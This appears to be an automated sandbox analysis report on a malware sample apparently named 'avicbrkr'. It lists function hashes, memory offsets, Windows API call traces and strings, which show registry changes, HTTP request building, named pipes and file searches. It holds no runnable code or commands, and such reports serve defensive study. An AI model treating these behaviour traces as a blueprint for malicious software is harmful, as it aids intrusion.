                      • Instruction ID: 2e0c9cd7db1d3895d8896057bc5b7a5e7d798ba19cec6bb7fe0c937cd3760994
                      • Opcode Fuzzy Hash: 35438fcc07f22b4af2a5b96708bf4ce167b09e5199481dee9ee1a5750d7f593d
                      • Instruction Fuzzy Hash: 8EE0C274200600AFD72ACF15D945E22BBB5FF89310B10C69EE88A877A1D732E846CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 654dda97600f0325757e25518b0105eb51fe5c6a7fbd7ce9e5c34c84f8a53ee2
                      • Instruction ID: 20ca0a30a8cd109732e1af9c9b8998ef4914960933730e529dff3ddf7dc751fc
                      • Opcode Fuzzy Hash: 654dda97600f0325757e25518b0105eb51fe5c6a7fbd7ce9e5c34c84f8a53ee2
                      • Instruction Fuzzy Hash: AFF155309086599FCB1ECFA9D0A05BCBBB2FF89314B24C1AED49A67645C7385A45CF14
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID:
                      • API String ID: 3510742995-0
                      • Opcode ID: f63daed9048ee3475c4c9ab2d2c77ec2ee355eddec15846fb7d3d0a55980faea
                      • Instruction ID: 9895997623a96bfb7bfb47c1ba78a533530f5a73082bef8fc43b95e708b756e2
                      • Opcode Fuzzy Hash: f63daed9048ee3475c4c9ab2d2c77ec2ee355eddec15846fb7d3d0a55980faea
                      • Instruction Fuzzy Hash: 6EC11135600B408FD76AEF29C490A66B3E1FF88304B5449AED9D787B62D775F889CB40
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                      • Instruction ID: 0eb44bb463232a8634efaf665a1e39df6050e87e181626862dfed7caaef902db
                      • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                      • Instruction Fuzzy Hash: DF21B6329006049FCB14EF68C8C09A7B7A6FF44310F498569E9578B245D731FA15CBE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                      • Instruction ID: 5ff9bad46122407ae2f431a9769d9a447fda178e47f62277d9b797a72dee385f
                      • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                      • Instruction Fuzzy Hash: 3021A7329006059BCF16EF68C8C49A7B7A5BF45310B068158DD16DB245D730FA55CBE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(0039ECB8,00000000,?,?), ref: 0037CE75
                        • Part of subcall function 00378138: memset.NTDLL ref: 00378174
                        • Part of subcall function 00378138: HeapFree.KERNEL32(00000000,00000000), ref: 00378191
                        • Part of subcall function 00378138: memcpy.NTDLL(?,?,0037C7DD,?,0037C7DD,?,?,00000000,?,00000000,0037CD1F,?,00000000), ref: 003781B2
                      • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0037CF0F
                      • lstrcpyn.KERNEL32(00000000,?,?), ref: 0037CF24
                        • Part of subcall function 0037B7D8: RtlEnterCriticalSection.NTDLL(0039D508), ref: 0037B7E3
                        • Part of subcall function 0037B7D8: Sleep.KERNEL32(0000000A,?,?,0037CF37,00000000), ref: 0037B7ED
                        • Part of subcall function 0037B7D8: SetEvent.KERNEL32(?,?,0037CF37), ref: 0037B844
                        • Part of subcall function 0037B7D8: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 0037B863
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037CF40
                        • Part of subcall function 00378002: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00378064
                        • Part of subcall function 00378002: memcpy.NTDLL(00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 0037808A
                        • Part of subcall function 00378002: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 00378099
                        • Part of subcall function 00378002: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,0037CF58,00000000), ref: 003780AB
                      • HeapFree.KERNEL32(00000000,?), ref: 0037D106
                        • Part of subcall function 00377F9C: StrChrA.SHLWAPI(00000001,0000000D), ref: 00377FE6
                        • Part of subcall function 0037C211: HeapFree.KERNEL32(00000000,?,?), ref: 0037C27C
                        • Part of subcall function 0037C211: HeapFree.KERNEL32(00000000,?,?), ref: 0037C2B4
                        • Part of subcall function 0037C211: HeapFree.KERNEL32(00000000,?,?), ref: 0037C320
                      • StrChrA.SHLWAPI(?,00000020), ref: 0037D018
                      • StrChrA.SHLWAPI(00000001,00000020), ref: 0037D029
                      • lstrlen.KERNEL32(00000000), ref: 0037D03D
                      • memmove.NTDLL(?,?,00000001), ref: 0037D04D
                        • Part of subcall function 0037C6D4: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 0037C6F5
                      • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 0037D070
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037D096
                      • memcpy.NTDLL(00000000,?,?), ref: 0037D0AA
                      • memcpy.NTDLL(?,?,?), ref: 0037D0CA
                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0037D1CC
                        • Part of subcall function 0037B206: RtlAllocateHeap.NTDLL(00000000,?), ref: 0037B285
                        • Part of subcall function 0037B206: wsprintfA.USER32 ref: 0037B33D
                        • Part of subcall function 0037B206: memcpy.NTDLL(00000000,?,?), ref: 0037B382
                        • Part of subcall function 0037B206: InterlockedExchange.KERNEL32(0039D22C,00000000), ref: 0037B3A0
                        • Part of subcall function 0037B206: HeapFree.KERNEL32(00000000,00000000), ref: 0037B3E3
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0037D214
                        • Part of subcall function 0038AC59: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0038ACD6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$memcpy$Allocate$CriticalSectionlstrlen$Leave$EnterEventExchangeInterlockedSleeplstrcpynmemmovememsetwsprintf
                      • String ID: GET $GET $OPTI$OPTI$POST$PUT
                      • API String ID: 685776946-647159250
                      • Opcode ID: ea4177eae4d43d4bd150171337dc7492029e60294a307a7f9fe862ca058d7c7e
                      • Instruction ID: a5bd01b4ba99d080f2e5235a14595d49b187c175b625467295c2ffdf8587615f
                      • Opcode Fuzzy Hash: ea4177eae4d43d4bd150171337dc7492029e60294a307a7f9fe862ca058d7c7e
                      • Instruction Fuzzy Hash: BCD14A31A00205EFDB26DFA8CD85BA9BBB9FF04300F158099F819AB291D739ED51DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • StrChrA.SHLWAPI(!Cc,0000005F), ref: 00632F03
                      • lstrcpy.KERNEL32(?,?), ref: 00632F1B
                      • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00632F51
                      • lstrlenW.KERNEL32 ref: 00632F88
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00632F9D
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00632FE8
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00632FFA
                      • lstrcmpiW.KERNEL32(00000000), ref: 00633011
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00633196
                        • Part of subcall function 006341F8: lstrlenW.KERNEL32(00000000,?,!Cc,00633030,00000000,?), ref: 0063420B
                        • Part of subcall function 006341F8: lstrlen.KERNEL32(?), ref: 00634216
                        • Part of subcall function 006341F8: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0063422B
                        • Part of subcall function 006341F8: wsprintfW.USER32 ref: 00634243
                        • Part of subcall function 006344D4: lstrlenW.KERNEL32(00633038,?,00000000,?,!Cc,00633038,00000000), ref: 006344DD
                        • Part of subcall function 006344D4: memcpy.NTDLL(00000000,00633038,00000000,00000000,?,?,!Cc,00633038,00000000), ref: 00634507
                        • Part of subcall function 006344D4: memset.NTDLL ref: 0063451B
                      • lstrcpy.KERNEL32(?,006380FA), ref: 00633053
                        • Part of subcall function 00632BE1: GetLastError.KERNEL32 ref: 00632C62
                        • Part of subcall function 00632BE1: SetEndOfFile.KERNEL32(?), ref: 00632C6E
                        • Part of subcall function 00632BE1: CloseHandle.KERNEL32(?), ref: 00632C77
                        • Part of subcall function 00632BE1: GetLastError.KERNEL32 ref: 00632C7F
                        • Part of subcall function 00632BE1: GetLastError.KERNEL32 ref: 00632CBA
                        • Part of subcall function 00632BE1: FlushFileBuffers.KERNEL32(00000000), ref: 00632CC4
                        • Part of subcall function 00632BE1: GetLastError.KERNEL32 ref: 00632CCC
                      • lstrcpy.KERNEL32(?,?), ref: 006330AC
                      • RegCreateKeyA.ADVAPI32(?,?,?), ref: 006330C0
                      • RegQueryValueExA.ADVAPI32(?,00638256,00000000,?,?,?), ref: 006330E3
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 00633146
                      • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 00633161
                      • RegDeleteValueW.ADVAPI32(?,006376D0), ref: 0063316F
                      • RegCloseKey.ADVAPI32(?), ref: 00633178
                      • RegCloseKey.ADVAPI32(?), ref: 00633181
                      • HeapFree.KERNEL32(00000000,00000000), ref: 006331B9
                      • RegCloseKey.ADVAPI32(?), ref: 006331CB
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseErrorHeapLastlstrlen$CreateOpenlstrcpy$AllocateDirectoryFileFreeValue$BuffersDeleteFlushHandleQuerylstrcmpimemcpymemsetwsprintf
                      • String ID: !Cc
                      • API String ID: 2299567637-3374438881
                      • Opcode ID: 2df8ad261926e904fb8f17c0965e205c000bbbdbb0c78042e2e0f21fea27f1a5
                      • Instruction ID: a3a8f1609a39ddf5788729a961c6bd70d94ec558c8fb16d4e005f0cdec3d9b29
                      • Opcode Fuzzy Hash: 2df8ad261926e904fb8f17c0965e205c000bbbdbb0c78042e2e0f21fea27f1a5
                      • Instruction Fuzzy Hash: D09124B1900219FFDF219F94DD89DEEBBBAFF05301F108069F901A2220D7309E559BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0037469E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 003746D1
                        • Part of subcall function 0037469E: GetLastError.KERNEL32 ref: 00374778
                        • Part of subcall function 0037469E: ReleaseMutex.KERNEL32(00000000), ref: 00374781
                        • Part of subcall function 0037469E: CloseHandle.KERNEL32(00000000), ref: 0037478F
                        • Part of subcall function 0037469E: GetLastError.KERNEL32 ref: 0037479C
                        • Part of subcall function 00374557: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0037456E
                        • Part of subcall function 00374557: CreateWaitableTimerA.KERNEL32(0039D2D8,?,?), ref: 0037458D
                        • Part of subcall function 00374557: GetLastError.KERNEL32 ref: 0037459D
                        • Part of subcall function 00374557: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 003745E4
                        • Part of subcall function 00374557: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 00374618
                      • GetVersionExA.KERNEL32 ref: 003754FA
                      • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 0037550D
                      • wsprintfA.USER32 ref: 0037553F
                        • Part of subcall function 00375124: lstrcmp.KERNEL32(?,?), ref: 0037519B
                        • Part of subcall function 00375124: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_0000408F,?,00000001), ref: 0037526D
                        • Part of subcall function 00375124: GetCurrentThread.KERNEL32 ref: 0037527E
                        • Part of subcall function 00375124: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 003752DC
                        • Part of subcall function 00375124: wsprintfA.USER32 ref: 003752ED
                        • Part of subcall function 00375124: lstrlen.KERNEL32(00000000,00000000), ref: 003752F8
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 003755C3
                        • Part of subcall function 00373DA8: RegCreateKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DBD
                        • Part of subcall function 00373DA8: RegOpenKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DCA
                        • Part of subcall function 00373DA8: lstrlen.KERNEL32(0039D244,00000000,00000000,00000000,?,?,?,00373E29,00000000,00000000,00000000,00000000,?,?,?,00374EBE), ref: 00373DEB
                        • Part of subcall function 003743BE: RegOpenKeyA.ADVAPI32(80000001,?), ref: 003743DC
                        • Part of subcall function 003743BE: RtlAllocateHeap.NTDLL(00000000,?), ref: 00374412
                        • Part of subcall function 003743BE: HeapFree.KERNEL32(00000000,?), ref: 0037444B
                        • Part of subcall function 003743BE: RegCloseKey.ADVAPI32(?), ref: 00374454
                      • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 0037566B
                        • Part of subcall function 00375393: WaitForSingleObject.KERNEL32(?,00000000), ref: 0037539F
                        • Part of subcall function 00375393: HeapFree.KERNEL32(00000000,?,?), ref: 003753CD
                        • Part of subcall function 00375393: ResetEvent.KERNEL32(?,?), ref: 003753E7
                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 003756DC
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32(?,00000000,?,?), ref: 0038EE36
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32 ref: 0038EF1E
                        • Part of subcall function 0038EDFA: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038EF32
                        • Part of subcall function 0038EDFA: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038EF50
                        • Part of subcall function 0038EDFA: StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038EF86
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F03B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,0039F27A), ref: 0038F04D
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F05B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F06B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F07B
                      • _allmul.NTDLL(0039CB54,00000000,FF676980,000000FF), ref: 00375780
                        • Part of subcall function 00374151: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 003741A5
                        • Part of subcall function 00374151: lstrcmpi.KERNEL32(00000000,0039F23C), ref: 003741C5
                        • Part of subcall function 00374151: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037420A
                        • Part of subcall function 00374151: HeapFree.KERNEL32(00000000,?,?), ref: 0037421B
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00375738
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 003757B0
                      • ReleaseMutex.KERNEL32(?), ref: 003757CD
                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00375821
                      • SwitchToThread.KERNEL32 ref: 0037583D
                      • ReleaseMutex.KERNEL32(?), ref: 00375847
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373907
                        • Part of subcall function 003738C7: RtlAllocateHeap.NTDLL(00000000,00010000,0039E1D3), ref: 00373925
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 00373954
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,00000000,0000011B), ref: 003739BE
                        • Part of subcall function 003738C7: RtlAllocateHeap.NTDLL(00000000,00000400,0039E1D3), ref: 00373A83
                        • Part of subcall function 003738C7: wsprintfA.USER32 ref: 00373A97
                        • Part of subcall function 003738C7: lstrlen.KERNEL32(00000000,00000000), ref: 00373AA2
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373ABC
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373ADE
                        • Part of subcall function 003738C7: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00373AF9
                        • Part of subcall function 003738C7: wsprintfA.USER32 ref: 00373B09
                        • Part of subcall function 003738C7: lstrlen.KERNEL32(00000000,00000000), ref: 00373B14
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373B2E
                        • Part of subcall function 003738C7: HeapFree.KERNEL32(00000000,?,?), ref: 00373B3E
                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 003758B3
                      • SwitchToThread.KERNEL32 ref: 003758CF
                      • ReleaseMutex.KERNEL32(?), ref: 003758D9
                        • Part of subcall function 00375347: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 00375378
                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 003758E9
                        • Part of subcall function 00374505: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00374512
                        • Part of subcall function 00374505: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0037454C
                        • Part of subcall function 0038E8FE: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E90B
                        • Part of subcall function 0038E8FE: Sleep.KERNEL32(0000000A,?,00397044,0038E984,0039D480,00000000,00397050,0038F19B), ref: 0038E915
                        • Part of subcall function 0038E8FE: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E964
                        • Part of subcall function 00374354: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 00374376
                        • Part of subcall function 00374354: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 003743A7
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$Wait$lstrlen$CriticalErrorLastMutexReleaseSectionThreadTime_allmulwsprintf$CreateMultipleObjectObjectsOpenSingleTimerWaitable$CloseCountCurrentEnterEventFileLeaveSwitchSystemTickmemcpy$CallHandleNamedPipeResetSleepTrimVersionlstrcmplstrcmpi
                      • String ID: Main
                      • API String ID: 1772234139-521822810
                      • Opcode ID: 3c02efa6d2e9fa9a034a649a651587892438c684a2da0f6feb8b9696b37cf658
                      • Instruction ID: f4b419efbaebc59ee72f09b89a4bd63fb31003f8da756e9902ee63c029325c55
                      • Opcode Fuzzy Hash: 3c02efa6d2e9fa9a034a649a651587892438c684a2da0f6feb8b9696b37cf658
                      • Instruction Fuzzy Hash: 60F18E71408345EFDB26AF65CC8196ABBEDFB85364F014A2EF598922A0D775DC00CF52
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 003898C0
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003898F2
                      • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00389906
                      • CloseHandle.KERNEL32(00000094), ref: 0038991D
                      • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 00389929
                      • lstrcat.KERNEL32(00001000,0039FAF9), ref: 00389963
                      • FindNextFileA.KERNEL32(?,?), ref: 003899AB
                      • StrChrA.SHLWAPI(?,0000002E), ref: 00389A19
                      • memcpy.NTDLL(0039D494,?,00000000), ref: 00389A52
                      • FindNextFileA.KERNEL32(?,?), ref: 00389A67
                      • CompareFileTime.KERNEL32(?,?), ref: 00389A90
                      • HeapFree.KERNEL32(00000000,0039D494), ref: 00389AC6
                      • HeapFree.KERNEL32(00000000,00001000), ref: 00389AD6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$FindFreeHeapNextTime$CloseCompareCreateHandlelstrcatmemcpymemset
                      • String ID: .dll$pnls$}nls
                      • API String ID: 293928577-861231531
                      • Opcode ID: b3a5ae599700cac2b5d73e38da8f6b35f990f7c8eb0439d50a3bcd4165879588
                      • Instruction ID: 3b3984ec37847098780ed7aca673c88e9cd10cfc0f4301ee5efdc3006d9b611a
                      • Opcode Fuzzy Hash: b3a5ae599700cac2b5d73e38da8f6b35f990f7c8eb0439d50a3bcd4165879588
                      • Instruction Fuzzy Hash: 71813A72D00219AFDF12EFA5DC85AEEBBBDFF48300F1504AAE505E6290E7759A448F50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00633F6D
                      • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00633F81
                      • CloseHandle.KERNEL32(?), ref: 00633F98
                      • StrRChrA.SHLWAPI(006311A9,00000000,0000005C), ref: 00633FA4
                      • lstrcat.KERNEL32(006311A9,0063825D), ref: 00633FDE
                      • FindNextFileA.KERNEL32(?,?), ref: 00634026
                      • StrChrA.SHLWAPI(?,0000002E), ref: 00634094
                      • memcpy.NTDLL(0063618C,?,00000000), ref: 006340CD
                      • FindNextFileA.KERNEL32(?,?), ref: 006340E2
                      • CompareFileTime.KERNEL32(?,?), ref: 0063410B
                      • HeapFree.KERNEL32(00000000,0063618C,00638049), ref: 00634141
                      • HeapFree.KERNEL32(00000000,006311A9), ref: 00634151
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$FindFreeHeapNextTime$CloseCompareCreateHandlelstrcatmemcpy
                      • String ID: }nls
                      • API String ID: 1353604349-4196156762
                      • Opcode ID: d2130d7385b66fe4a460e6c0904ecad8bbd10cbf1ee8842e41da61f0ec12d69c
                      • Instruction ID: 5151b66f8fc60a883e44c5883ad35b7448c89b89ff5a4e7c1cde81b16feb884b
                      • Opcode Fuzzy Hash: d2130d7385b66fe4a460e6c0904ecad8bbd10cbf1ee8842e41da61f0ec12d69c
                      • Instruction Fuzzy Hash: 3F812D72D00219AFDB15DFA5DC85AEEBBBAFF48300F104566E515E2260DB71AA44CFA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373907
                      • RtlAllocateHeap.NTDLL(00000000,00010000,0039E1D3), ref: 00373925
                      • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 00373954
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32(?,00000000,?,?), ref: 0038EE36
                        • Part of subcall function 0038EDFA: GetTickCount.KERNEL32 ref: 0038EF1E
                        • Part of subcall function 0038EDFA: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038EF32
                        • Part of subcall function 0038EDFA: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038EF50
                        • Part of subcall function 0038EDFA: StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038EF86
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F03B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?,0039F27A), ref: 0038F04D
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F05B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F06B
                        • Part of subcall function 0038EDFA: HeapFree.KERNEL32(00000000,?), ref: 0038F07B
                      • HeapFree.KERNEL32(00000000,00000000,0000011B), ref: 003739BE
                        • Part of subcall function 0038EDBB: memcpy.NTDLL(0037D7B1,0037D7B1,00000000,0037D7B1,0037D7B1,0037D7B1,00000000,?,?,00374EE9,00000000,00000001,00000000,0039E1C6,0037D7B1,00000000), ref: 0038EDDE
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00373B3E
                        • Part of subcall function 00389B83: memset.NTDLL ref: 00389BB1
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(?,003973F4), ref: 00389C12
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(00000001,003973F4), ref: 00389C31
                        • Part of subcall function 00389B83: _strupr.NTDLL ref: 00389C38
                        • Part of subcall function 00389B83: StrTrimA.SHLWAPI(?,?), ref: 00389C45
                        • Part of subcall function 00389B83: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00389C8D
                        • Part of subcall function 00389B83: lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 00389CAC
                      • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373B2E
                        • Part of subcall function 00373EAC: RegCloseKey.ADVAPI32(00000057,?,?,003728FD,0039E1CF,00000000,00000000,00000000,~FvR9,00000000,00397048,?,?,?,00374C4E,00000000), ref: 00373EF7
                      • RtlAllocateHeap.NTDLL(00000000,00000400,0039E1D3), ref: 00373A83
                      • wsprintfA.USER32 ref: 00373A97
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00373AA2
                      • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373ABC
                      • HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373ADE
                      • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00373AF9
                      • wsprintfA.USER32 ref: 00373B09
                      • lstrlen.KERNEL32(00000000,00000000), ref: 00373B14
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                        • Part of subcall function 0037C12C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0039D244,?,?,00373DFB,0000012B,0039D244,?,?,?,00373E29,00000000,00000000), ref: 0037C16C
                        • Part of subcall function 0037C12C: CloseHandle.KERNEL32(000000FF), ref: 0037C177
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
